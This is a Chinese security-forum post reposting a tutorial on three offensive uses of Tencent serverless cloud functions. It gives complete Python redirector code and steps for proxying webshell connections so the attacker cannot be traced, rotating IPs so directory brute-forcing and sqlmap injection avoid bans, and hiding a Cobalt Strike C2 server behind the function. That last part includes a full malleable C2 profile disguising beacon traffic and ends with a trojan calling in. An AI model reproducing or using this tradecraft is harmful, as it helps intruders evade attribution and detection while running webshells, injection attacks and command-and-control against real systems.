安全矩阵

 找回密码
 立即注册
搜索
查看: 2740|回复: 0

云函数的三种常见利用

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-10-28 15:06:28 | 显示全部楼层 |阅读模式
原文链接:云函数的三种常见利用

01
前言

之前学到一些云函数的利用,感觉很有趣,于是借此篇来总结一下三种对云函数的简单利用方式。
02
云函数
云函数(Serverless Cloud Function,SCF)是腾讯云为企业和开发者们提供的无服务器执行环境,帮助您在无需购买和管理服务器的情况下运行代码。您只需使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。SCF 是实时文件处理和数据处理等场景下理想的计算平台。总结云函数的几个特性:
  •         多出口
  •         调用时创建执行
  •         无需服务器VPS承载
03
防溯源连接Webshell

之前最好的是某安全攻防实验室公众号发布了一篇<论如何防溯源连接Webshell>,利用云函数多出口的特性来规避溯源,可惜的是不久后就该文章就被删除了。以下介绍实际的利用方式
云函数创建
选择自定义创建


函数代码中脚本如下,主要是通过将Webshell地址作为参数传入云函数API中,在云函数服务端脚本中重组Webshell地址以及POST命令内容,将重组后的请求内容转发给Webshel
  1. #!/usr/bin/env
  2. # -*- coding:utf-8 -*-
  3. import requests
  4. import json
  5. from urllib.parse import urlsplit
  6. def geturl(urlstr):
  7.        jurlstr = json.dumps(urlstr)
  8.        dict_url = json.loads(jurlstr)
  9.        return dict_url['u']
  10. def main_handler(event, context):
  11.        url = geturl(event['queryString'])
  12.        host = urlsplit(url).netloc
  13.        postdata = event['body']
  14.        headers=event['headers']
  15.        headers["HOST"] = host
  16.        resp=requests.post(url,data=postdata,headers=headers,verify=False)
  17.        response={
  18.        "isBase64Encoded": False,
  19.        "statusCode": 200,
  20.        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},
  21.        "body": resp.text
  22.   }
  23.        return response
复制代码



在触发器配置中选择API网关触发,然后点击创建,过一会会提示创建成功。

https://service-dafetmeh-xxxx/release/Webshell_Bypass?u=http://xxxx/webshell.php


利用
我们可以通过蚁剑直接连接Webshell,URL请求地址填为api地址+webshell地址


然后vps端通过监控日志查看访问webshell的ip地址

通过access.log可以发现每次请求都是不同的ip地址并且都是来自上海地区的腾讯云(根据自己选择地区而改变)  

通过云函数的方法我们便可以隐藏连接Webshell的本机IP地址,从而防止溯源,如果使用可以蚁剑,为了达到更隐秘的目的,可以自行对Webshell流量进行加解密的操作来逃逸流量检测,流量检测+白名单IOC的方式可以完美的逃避检测。
04
注入/目录爆破爆破防Ban
云函数其实也可以作为一种变相的代理池供我们所用,利用云函数的多出口性来防止爆破或者SQL注入的时候被Ban
云函数创建
这里可以哈希安全团队公开的SCF-Proxy来实现,第一次看到Scf-Proxy的概念的应该是学蚁致用的作者,通过客户端监听获取请求并且组装API请求,服务端云函数解析且重组API请求,通过SCF-Proxy不光可以实现代理http请求,也可以代理https请求(类似Burp中间人监听的方式)  

项目地址:https://github.com/hashsecteam/scf-proxy  
下载下来然后利用Golang编译客户端和服务端,这里我把客户端编译成Win版本使用  
还是选择自定义创建,但是这里要选择Go,而不是默认的python,并,执行方法改为server,且选择本地上传zip,将server.zip上传上去

触发管理中依然选择API网关管理,创建完成后来到触发管理获取API地址

利用
​​
首先客户端开启监听  ./client.exe -port 10086 云函数api地址   


此时再通过dirsearch设置http代理的方式爆破VPS的目录   

查看access_log可以看到爆破的ip地址分布   

由于此次选择的是广州地区,于是访问的ip基本都是来自广州   

也可以代理访问https网站  

由此可以实现爆破目录以及Sqlmap的爆破不被Ban
05
C2隐藏
通过云函数的特性,我们依然可以做到CS上线的隐藏,由于Cs支持HTTP/HTTPS类型的Beacon,因此我们也可以通过云函数来转发HTTP/HTTPS请求,该方法学习自狼组北美第一突破手师傅  
云函数创建
与第一种别无二样,依然选择API网关触发的方式,就是云函数服务端脚本修改为如下
  1. # -*- coding: utf8 -*-
  2. import json,requests,base64
  3. def main_handler(event, context):
  4.    C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~
  5.    path=event['path']
  6.    headers=event['headers']
  7.    print(event)
  8.    if event['httpMethod'] == 'GET' :
  9.        resp=requests.get(C2+path,headers=headers,verify=False)
  10.    else:
  11.        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
  12.        print(resp.headers)
  13.        print(resp.content)
  14.    response={
  15.        "isBase64Encoded": True,
  16.        "statusCode": resp.status_code,
  17.        "headers": dict(resp.headers),
  18.        "body": str(base64.b64encode(resp.content))[2:-1]
  19.   }
  20.    return response
复制代码

Cs可以定制Profile来更加隐匿流量这里使用如下的Profile
  1. set sample_name "kris_abao";
  2. set sleeptime "3000";
  3. set jitter   "0";
  4. set maxdns   "255";
  5. set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
  6. http-get {
  7.   set uri "/api/getit";
  8.   client {
  9.       header "Accept" "*/*";
  10.       metadata {
  11.           base64;
  12.           prepend "SESSIONID=";
  13.           header "Cookie";
  14.       }
  15.   }
  16.   server {
  17.       header "Content-Type" "application/ocsp-response";
  18.       header "content-transfer-encoding" "binary";
  19.       header "Server" "Nodejs";
  20.       output {
  21.           base64;
  22.           print;
  23.       }
  24.   }
  25. }
  26. http-stager {  
  27.   set uri_x86 "/vue.min.js";
  28.   set uri_x64 "/bootstrap-2.min.js";
  29. }
  30. http-post {
  31.   set uri "/api/postit";
  32.   client {
  33.       header "Accept" "*/*";
  34.       id {
  35.           base64;
  36.           prepend "JSESSION=";
  37.           header "Cookie";
  38.       }
  39.       output {
  40.           base64;
  41.           print;
  42.       }
  43.   }
  44.   server {
  45.       header "Content-Type" "application/ocsp-response";
  46.       header "content-transfer-encoding" "binary";
  47.       header "Connection" "keep-alive";
  48.       output {
  49.           base64;
  50.           print;
  51.       }
  52.   }
  53. }
复制代码

创建完后放到将api.profile放到服务端Cs上可以通过c2lint检查一下profile,可以看到正常的定义http类型Beacon的get和post请求时的样子  


监听设置   

生成木马,点击后上线   

公网地址会不断的跳,因为这里呈现的是请求源的IP,也就是我们的云函数IP地址,基本都是腾讯的IDC机房中的IP  在该过程中遇到了一些问题,比如说Stager较大,导致请求超时,这时候可以修改代码加点演示设置即可


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 22:23 , Processed in 0.013868 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表